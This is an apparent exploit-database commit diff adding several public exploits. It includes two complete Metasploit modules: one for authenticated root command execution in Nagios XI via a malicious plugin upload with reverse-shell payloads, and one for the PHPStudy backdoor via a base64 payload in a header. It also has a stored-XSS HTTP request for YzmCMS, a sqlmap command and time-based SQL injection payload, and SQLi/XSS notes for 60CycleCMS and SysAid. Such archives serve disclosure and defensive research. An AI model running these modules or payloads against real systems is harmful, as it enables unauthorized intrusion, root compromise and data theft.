DB: 2020-03-11

7 changes to exploits/shellcodes

Counter Strike: GO - '.bsp' Memory Control (PoC)
Nagios XI - Authenticated Remote Command Execution (Metasploit)
PHPStudy - Backdoor Remote Code execution (Metasploit)
Sysaid 20.1.11 b26 - Remote Command Execution
YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
Persian VIP Download Script 1.0 - 'active' SQL Injection

exploits/java/webapps/48188.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
+# Google Dork: intext:"Help Desk Software by SysAid <http://www.sysaid.com/>"
+# Date: 2020-03-09
+# Exploit Author: Ahmed Sherif
+# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
+# Software Link: [https://www.sysaid.com/free-help-desk-software
+# Version:  Sysaid v20.1.11 b26
+# Tested on: Windows Server 2016
+# CVE : None
+
+GhostCat Attack
+
+The default
+installation of Sysaid is enabling the exposure of AJP13 protocol which is used
+by tomcat instance, this vulnerability has been released recently on
+different blogposts
+<https://www.zdnet.com/article/ghostcat-bug-impacts-all-apache-tomcat-versions-released-in-the-last-13-years/>.
+
+
+*Proof-of-Concept*
+
+[image: image.png]
+
+The
+attacker would be able to exploit the vulnerability and read the Web.XML of
+Sysaid.
+Unauthenticated File Upload
+
+It was
+found on the Sysaid application that an attacker would be able to upload files
+without authenticated by directly access the below link:
+
+http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=
+
+
+
+In the above screenshot, it shows that an attacker can execute commands
+in the system without any prior authentication to the system.

exploits/linux/remote/48191.rb

@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Nagios XI Authenticated Remote Command Execution',
+      'Description'     => %q{
+        This module exploits a vulnerability in Nagios XI before 5.6.6 in
+        order to execute arbitrary commands as root.
+
+        The module uploads a malicious plugin to the Nagios XI server and then
+        executes this plugin by issuing an HTTP GET request to download a
+        system profile from the server. For all supported targets except Linux
+        (cmd), the module uses a command stager to write the exploit to the
+        target via the malicious plugin. This may not work if Nagios XI is
+        running in a restricted Unix environment, so in that case the target
+        must be set to Linux (cmd). The module then writes the payload to the
+        malicious plugin while avoiding commands that may not be supported.
+
+        Valid credentials for a user with administrative privileges are
+        required. This module was successfully tested on Nagios XI 5.6.5
+        running on CentOS 7. The module may behave differently against older
+        versions of Nagios XI. See the documentation for more information.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Jak Gibb',       # https://github.com/jakgibb/ - Discovery and exploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-15949'],
+          ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
+        ],
+      'Payload'        => { 'BadChars' => "\x00" },
+      'Targets'        =>
+        [
+          [ 'Linux (x86)', {
+            'Arch' => ARCH_X86,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (x64)', {
+            'Arch' => ARCH_X64,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x64/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (cmd)', {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'cmd/unix/reverse_bash'
+            },
+            'Payload' => {
+              'Append' => ' & disown',  # the payload must be disowned after execution, otherwise cleanup fails
+              'BadChars' => "\""
+            }
+          } ]
+        ],
+      'Privileged'      => true,
+      'DisclosureDate'  => 'Jul 29 2019',
+      'DefaultOptions'  => {
+        'RPORT' => 80,
+        'HttpClientTimeout' => 2, #This is needed to close the connection to the server following the system profile download request.
+        'WfsDelay'          => 10
+        },
+      'DefaultTarget'   => 1))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to NagiosXI', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+    ]
+
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+    import_target_defaults
+  end
+
+  def check
+    vprint_status("Running check")
+
+    #visit Nagios XI login page to obtain the nsp value required for authentication
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('Nagios XI')
+      return CheckCode::Safe('Target is not a Nagios XI application.')
+    end
+
+    @nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+
+    if @nsp.to_s.eql? ''
+      return CheckCode::NoAccess, 'Could not retrieve nsp value, making authentication impossible.'
+    end
+
+    #Attempt to authenticate
+    @username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+
+    auth_res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/login.php'),
+      'method'       => 'POST',
+      'cookie'       => cookie,
+      'vars_post'    => {
+        nsp: @nsp,
+        page:  'auth',
+        debug: '',
+        pageopt: 'login',
+        username: @username,
+        password: password,
+        loginButton: ''
+      }
+    })
+
+    unless auth_res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless auth_res.code == 302 && auth_res.headers['Location'] == "index.php"
+      fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+    end
+
+    #Check Nagios XI version - this requires a separate request because following the redirect doesn't work
+    @cookie = auth_res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+    @cookie = @cookie.split().last #app returns 3 cookies, we need only the last one
+    version_check = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/index.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'nsp'          => @nsp
+    })
+
+    unless version_check
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless version_check.code == 200 && version_check.body.include?('Home Dashboard')
+      fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+    end
+
+    @version = version_check.body.scan(/product=nagiosxi&version=(\d+\.\d+\.\d+)/).flatten.first rescue ''
+    if @version.to_s.eql? ''
+      return CheckCode::Detected('Could not determine Nagios XI version.')
+    end
+
+    @version = Gem::Version.new @version
+
+    unless @version <= Gem::Version.new('5.6.5')
+      return CheckCode::Safe("Target is Nagios XI with version #{@version}.")
+    end
+
+    CheckCode::Appears("Target is Nagios XI with version #{@version}.")
+  end
+
+  def check_plugin_permissions
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'nsp'          => @nsp
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200 && res.body.include?('Manage Plugins')
+      fail_with(Failure::NoAccess, "The user #{@username} does not have permission to edit plugins, which is required for the exploit to work.")
+    end
+
+    @plugin_nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+    if @plugin_nsp.to_s.eql? ''
+      fail_with Failure::NoAccess, 'Failed to obtain the nsp value required for the exploit to work.'
+    end
+
+    @plugin_cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+  end
+
+  def execute_command(cmd, opts = {})
+    print_status("Uploading malicious 'check_ping' plugin...")
+    boundary = rand_text_numeric(14)
+    post_data = "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"upload\"\n\n1\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"nsp\"\n\n"
+    post_data << "#{@plugin_nsp}\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\n" #the exploit doesn't work with a random filename
+    post_data << "Content-Type: text/plain\n\n"
+    post_data << "#{cmd}\n"
+    post_data << "-----------------------------#{boundary}--\n"
+
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'POST',
+      'ctype'        => "multipart/form-data; boundary=---------------------------#{boundary}", #this needs to be specified here, otherwise the default value is sent in the header
+      'cookie'       => @plugin_cookie,
+      'data'         => post_data
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Upload failed'
+    end
+
+    unless res.code == 200 && res.body.include?('New plugin was installed successfully')
+      fail_with Failure::Unknown, 'Failed to upload plugin.'
+    end
+
+    @plugin_installed = true
+  end
+
+  def execute_payload #This request will timeout. It has to, for the exploit to work.
+    print_status("Executing plugin...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/includes/components/profile/profile.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'vars_get' => { cmd: 'download' }
+    })
+  end
+
+  def cleanup()
+    return unless @plugin_installed
+
+    print_status("Deleting malicious 'check_ping' plugin...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'GET',
+      'cookie'       => @plugin_cookie,
+      'vars_get' => {
+        delete: 'check_ping',
+        nsp: @plugin_nsp
+      }
+    })
+
+    unless res
+      print_warning("Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.")
+      return
+    end
+
+    unless res.code == 200 && res.body.include?('Plugin deleted')
+      print_warning("Failed to delete the malicious 'check_ping' plugin. Manual cleanup is required.")
+      return
+    end
+
+    print_good("Plugin deleted.")
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if @version
+      print_status("Found Nagios XI application with version #{@version}.")
+    end
+
+    check_plugin_permissions
+    vprint_status("User #{@username} has the required permissions on the target.")
+
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+      message = "Waiting for the payload to connect back..."
+    else
+      execute_cmdstager(background: true)
+      message = "Waiting for the plugin to request the final payload..."
+    end
+    print_good("Successfully uploaded plugin.")
+    execute_payload
+    print_status "#{message}"
+  end
+end

exploits/multiple/local/48187.txt

@@ -0,0 +1,3 @@
+So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp

exploits/php/remote/48192.rb

@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "PHPStudy Backdoor Remote Code execution",
+      'Description'    => %q{
+        This module can detect and exploit the backdoor of PHPStudy.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Dimensional',  #POC
+          'Airevan'       #Metasploit Module
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['PHPStudy 2016-2018', {}]
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 20 2019",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
+      ])
+  end
+  def check
+    uri = target_uri.path
+    fingerprint = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi({
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(uri, 'index.php'),
+      'headers' =>  {
+        'Accept-Encoding' =>  'gzip,deflate',
+        'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s.include?(fingerprint)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+  def exploit
+    uri = target_uri.path
+    print_good("Sending shellcode")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(uri, 'index.php'),
+      'headers' => {
+          'Accept-Encoding' => 'gzip,deflate',
+          'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)
+      }
+  })
+  end
+end

exploits/php/webapps/48177.txt

@@ -1,6 +1,6 @@
-# Exploit Title: 60CycleCMS 2.5.2  - 'news.php' SQL Injection
+# Exploit Title: 60CycleCMS  - 'news.php' Multiple vulnerability
 # Google Dork: N/A
-# Date: 2020-03-07
+# Date: 2020-02-10
 # Exploit Author: Unkn0wn
 # Vendor Homepage: http://davidvg.com/
 # Software Link: https://www.opensourcecms.com/60cyclecms
@@ -15,53 +15,49 @@ in file /common/lib.php Line 64 -73
 *
 function getCommentsLine($title)
 {
-=09$title =3D addslashes($title);
+$title = addslashes($title);
-=09$query =3D "SELECT `timestamp` FROM `comments` WHERE entry_id=3D '$title=
+$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
-'";
+// query MySQL server
-=09// query MySQL server
+$result=mysql_query($query) or die("MySQL Query fail: $query");
-=09$result=3Dmysql_query($query) or die("MySQL Query fail: $query");=09
+$numComments = mysql_num_rows($result);
-=09$numComments =3D mysql_num_rows($result);
+$encTitle = urlencode($title);
-=09$encTitle =3D urlencode($title);
+return '<a href="post.php?post=' . $encTitle . '#comments" >' . $numComments . ' comments</a>';
-=09return '<a href=3D"post.php?post=3D' . $encTitle . '#comments" >' . $num=
-Comments . ' comments</a>';=09
 }
 lib.php line 44:
 *
-=09$query =3D "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `en=
+$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
-try_id` =3D'$title' ORDER BY `timestamp` ASC";
 
 *
 *
 news.php line 3:
 *
 require 'common/lib.php';
-*=20
+*
 Then in line 15 return query us:
 *
-$query =3D "SELECT MAX(`timestamp`) FROM `entries
+$query = "SELECT MAX(`timestamp`) FROM `entries
 *
 
-http://127.0.0.1/news.php?title=3D$postName[SQL Injection]
+http://127.0.0.1/news.php?title=$postName[SQL Injection]
 ----------------------------
 Cross Site-Scripting vulnerability:
 File news.php in line: 136-138 :
 *
-$ltsu =3D $_GET["ltsu"];
+$ltsu = $_GET["ltsu"];
-$etsu =3D $_GET["etsu"];
+$etsu = $_GET["etsu"];
-$post =3D $_GET["post"];
+$post = $_GET["post"];
 *
 get payload us and printEnerty.php file in line 26-27:
 *
-<? echo '<a class=3D"navLink" href=3D"index.php?etsu=3D' . $etsu . '">Older=
+<? echo '<a class="navLink" href="index.php?etsu=' . $etsu . '">Older ></a>';
- ></a>';
+<? echo '<a class="navLink" href="index.php?ltsu=' . 0 . '">Oldest >>|</a>';
-<? echo '<a class=3D"navLink" href=3D"index.php?ltsu=3D' . 0 . '">Oldest &g=
-t;>|</a>';=20
 *
 
 print it for us!
-http://127.0.0.1/index.php?etsu=3D[XSS Payloads]
+http://127.0.0.1/index.php?etsu=[XSS Payloads]
-http://127.0.0.1/index.php?ltsu=3D[XSS Payloads]
+http://127.0.0.1/index.php?ltsu=[XSS Payloads]
 ----------------------------------------------------------
-
+# Contact : 0x9a@tuta.io
+# Visit: https://t.me/l314XK205E
 # @ 2010 - 2020
 # Underground Researcher

exploits/php/webapps/48189.txt

@@ -0,0 +1,34 @@
+# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-03-10
+# Exploit Author: En
+# Vendor Homepage: https://github.com/yzmcms/yzmcms
+# Software Link: https://github.com/yzmcms/yzmcms
+# Version: V5.5
+# Category: Web Application
+# Patched Version: unpatched
+# Tested on: Win10x64
+# Platform: PHP
+# CVE : N/A
+#Exploit Author: En_dust
+
+#Description：
+#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
+
+
+#PoC：
+POST /yzmcms/link/link/add.html HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1/yzmcms/link/link/add.html
+Content-Length: 130
+Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
+DNT: 1
+Connection: close
+
+name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1

exploits/php/webapps/48190.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection
+# Data: 2020-03-09
+# Exploit Author: S3FFR
+# Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-Download(FreeScript.ir).zip
+# Version: = 1.0 [Final Version]
+# Tested on: Windows,Linux
+# Google Dork: N/A
+
+
+=======================
+Vulnerable Page:
+
+/cart_edit.php
+
+=======================
+
+Vulnerable Source:
+
+89: mysql_query $user_p = mysql_fetch_array(mysql_query("SELECT * FROM `users` where id='$active'")); 
+71: $active = $_GET['active']; 
+
+======================
+sqlmap:
+
+sqlmap -u "http://target.com/cart_edit.php?active=1" -p active --cookie=[COOKIE] --technique=T --dbs
+=======================
+
+Testing Method :
+	
+	- time-based blind
+
+Parameter: active (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: active=1' AND (SELECT 4169 FROM (SELECT(SLEEP(5)))wAin) AND 'zpth'='zpth
+
+========================

files_exploits.csv

@@ -10986,6 +10986,7 @@ id,file,description,date,author,type,platform,port
 48174,exploits/windows/local/48174.txt,"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
 48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
 48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
+48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18036,6 +18037,8 @@ id,file,description,date,author,type,platform,port
 48183,exploits/multiple/remote/48183.rb,"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)",2020-03-09,Metasploit,remote,multiple,
 48184,exploits/multiple/remote/48184.rb,"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
+48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42449,3 +42452,6 @@ id,file,description,date,author,type,platform,port
 48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
 48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,
 48179,exploits/php/webapps/48179.txt,"Sentrifugo HRMS 3.2 - 'id' SQL Injection",2020-03-09,minhnb,webapps,php,
+48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
+48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
+48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,